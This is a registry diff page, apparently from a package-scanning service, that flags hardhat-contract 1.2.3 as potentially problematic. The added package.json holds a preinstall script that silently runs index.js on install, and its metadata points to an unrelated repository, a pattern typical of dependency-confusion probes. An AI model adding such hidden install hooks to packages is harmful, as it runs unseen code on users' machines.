hardhat-contract 1.2.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of hardhat-contract might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +20 -0
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "hardhat-contract",
3
+ "version": "1.2.3",
4
+ "description": "hardhat-contract_bugbounty",
5
+ "main": "main.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js > /dev/null 2>&1",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "git+https://github.com/PlatONnetwork/browser-server.git"
13
+ },
14
+ "author": "descar45",
15
+ "license": "ISC",
16
+ "bugs": {
17
+ "url": "https://github.com/PlatONnetwork/browser-server/issues"
18
+ },
19
+ "homepage": "https://github.com/PlatONnetwork/browser-server#readme"
20
+ }